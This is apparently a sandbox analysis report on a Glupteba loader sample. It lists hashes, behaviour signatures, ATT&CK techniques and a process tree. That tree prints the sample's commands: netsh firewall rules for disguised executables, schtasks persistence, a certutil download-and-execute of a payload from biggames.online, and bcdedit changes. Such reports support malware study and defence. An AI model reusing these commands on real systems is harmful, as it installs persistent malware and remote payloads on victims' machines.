Analysis

  • max time kernel
    126s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    20-05-2022 18:12

General

  • Target

    debbe172912022917f4dd474601c5c482861035e78f9effb590e15310f609c6b.exe

  • Size

    3.9MB

  • MD5

    a6e6a5298c97037f5f84d5137ce67f50

  • SHA1

    cbe82b83c5970186d6d3d3fb898bbe3988c96c99

  • SHA256

    debbe172912022917f4dd474601c5c482861035e78f9effb590e15310f609c6b

  • SHA512

    02bb695f2de853223762c26465cb9963671bcf7ef06145ad5da0809de44f61906282965adbcafd85dfb83cb38712c35bf218f0e042ebf91ff8cf24d4f26799b6

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 6 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • Executes dropped EXE 3 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Modifies boot configuration data using bcdedit 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 2 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of WriteProcessMemory 52 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\debbe172912022917f4dd474601c5c482861035e78f9effb590e15310f609c6b.exe
    "C:\Users\Admin\AppData\Local\Temp\debbe172912022917f4dd474601c5c482861035e78f9effb590e15310f609c6b.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3956
    • C:\Users\Admin\AppData\Local\Temp\debbe172912022917f4dd474601c5c482861035e78f9effb590e15310f609c6b.exe
      "C:\Users\Admin\AppData\Local\Temp\debbe172912022917f4dd474601c5c482861035e78f9effb590e15310f609c6b.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3504
      • C:\Users\Admin\AppData\Local\Temp\debbe172912022917f4dd474601c5c482861035e78f9effb590e15310f609c6b.exe
        "C:\Users\Admin\AppData\Local\Temp\debbe172912022917f4dd474601c5c482861035e78f9effb590e15310f609c6b.exe"
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:2524
        • C:\Users\Admin\AppData\Local\Temp\debbe172912022917f4dd474601c5c482861035e78f9effb590e15310f609c6b.exe
          "C:\Users\Admin\AppData\Local\Temp\debbe172912022917f4dd474601c5c482861035e78f9effb590e15310f609c6b.exe"
          4⤵
          • Adds Run key to start application
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:3028
          • C:\Windows\system32\cmd.exe
            C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4476
            • C:\Windows\system32\netsh.exe
              netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
              6⤵
                PID:384
            • C:\Windows\system32\cmd.exe
              C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\f02377ff5b23\f02377ff5b23\f02377ff5b23.exe" enable=yes"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3840
              • C:\Windows\system32\netsh.exe
                netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\f02377ff5b23\f02377ff5b23\f02377ff5b23.exe" enable=yes
                6⤵
                  PID:1868
              • C:\Windows\rss\csrss.exe
                C:\Windows\rss\csrss.exe ""
                5⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:4800
                • C:\Windows\rss\csrss.exe
                  C:\Windows\rss\csrss.exe ""
                  6⤵
                  • Executes dropped EXE
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:1952
                  • C:\Windows\SYSTEM32\schtasks.exe
                    schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                    7⤵
                    • Creates scheduled task(s)
                    PID:1516
                  • C:\Windows\SYSTEM32\schtasks.exe
                    schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://biggames.online/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
                    7⤵
                    • Creates scheduled task(s)
                    PID:416
                  • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
                    "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
                    7⤵
                    • Executes dropped EXE
                    PID:4832
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\Sysnative\bcdedit.exe /v
                    7⤵
                    • Modifies boot configuration data using bcdedit
                    PID:1296
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
        1⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3388

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Execution

      Scheduled Task

      1
      T1053

      Persistence

      Modify Existing Service

      1
      T1031

      Registry Run Keys / Startup Folder

      1
      T1060

      Scheduled Task

      1
      T1053

      Privilege Escalation

      Scheduled Task

      1
      T1053

      Defense Evasion

      Modify Registry

      1
      T1112

      Discovery

      Query Registry

      1
      T1012

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        Filesize

        1.7MB

        MD5

        13aaafe14eb60d6a718230e82c671d57

        SHA1

        e039dd924d12f264521b8e689426fb7ca95a0a7b

        SHA256

        f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

        SHA512

        ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

      • C:\Windows\rss\csrss.exe
        Filesize

        3.9MB

        MD5

        a6e6a5298c97037f5f84d5137ce67f50

        SHA1

        cbe82b83c5970186d6d3d3fb898bbe3988c96c99

        SHA256

        debbe172912022917f4dd474601c5c482861035e78f9effb590e15310f609c6b

        SHA512

        02bb695f2de853223762c26465cb9963671bcf7ef06145ad5da0809de44f61906282965adbcafd85dfb83cb38712c35bf218f0e042ebf91ff8cf24d4f26799b6

      • C:\Windows\rss\csrss.exe
        Filesize

        3.9MB

        MD5

        a6e6a5298c97037f5f84d5137ce67f50

        SHA1

        cbe82b83c5970186d6d3d3fb898bbe3988c96c99

        SHA256

        debbe172912022917f4dd474601c5c482861035e78f9effb590e15310f609c6b

        SHA512

        02bb695f2de853223762c26465cb9963671bcf7ef06145ad5da0809de44f61906282965adbcafd85dfb83cb38712c35bf218f0e042ebf91ff8cf24d4f26799b6

      • C:\Windows\rss\csrss.exe
        Filesize

        3.9MB

        MD5

        a6e6a5298c97037f5f84d5137ce67f50

        SHA1

        cbe82b83c5970186d6d3d3fb898bbe3988c96c99

        SHA256

        debbe172912022917f4dd474601c5c482861035e78f9effb590e15310f609c6b

        SHA512

        02bb695f2de853223762c26465cb9963671bcf7ef06145ad5da0809de44f61906282965adbcafd85dfb83cb38712c35bf218f0e042ebf91ff8cf24d4f26799b6

      • memory/384-144-0x0000000000000000-mapping.dmp
      • memory/416-159-0x0000000000000000-mapping.dmp
      • memory/1296-162-0x0000000000000000-mapping.dmp
      • memory/1516-158-0x0000000000000000-mapping.dmp
      • memory/1868-147-0x0000000000000000-mapping.dmp
      • memory/1952-157-0x0000000000400000-0x0000000000B0F000-memory.dmp
        Filesize

        7.1MB

      • memory/1952-151-0x0000000000000000-mapping.dmp
      • memory/2524-141-0x00000000011BD000-0x0000000001563000-memory.dmp
        Filesize

        3.6MB

      • memory/2524-137-0x0000000000000000-mapping.dmp
      • memory/3028-145-0x0000000000400000-0x0000000000B0F000-memory.dmp
        Filesize

        7.1MB

      • memory/3028-138-0x0000000000000000-mapping.dmp
      • memory/3504-136-0x0000000000400000-0x0000000000B0F000-memory.dmp
        Filesize

        7.1MB

      • memory/3504-135-0x0000000000400000-0x0000000000B0F000-memory.dmp
        Filesize

        7.1MB

      • memory/3504-133-0x0000000000400000-0x0000000000B0F000-memory.dmp
        Filesize

        7.1MB

      • memory/3504-132-0x0000000000000000-mapping.dmp
      • memory/3840-146-0x0000000000000000-mapping.dmp
      • memory/3956-130-0x000000000125A000-0x0000000001600000-memory.dmp
        Filesize

        3.6MB

      • memory/3956-131-0x0000000001610000-0x0000000001D05000-memory.dmp
        Filesize

        7.0MB

      • memory/4476-143-0x0000000000000000-mapping.dmp
      • memory/4800-155-0x0000000001600000-0x00000000019A6000-memory.dmp
        Filesize

        3.6MB

      • memory/4800-148-0x0000000000000000-mapping.dmp
      • memory/4832-160-0x0000000000000000-mapping.dmp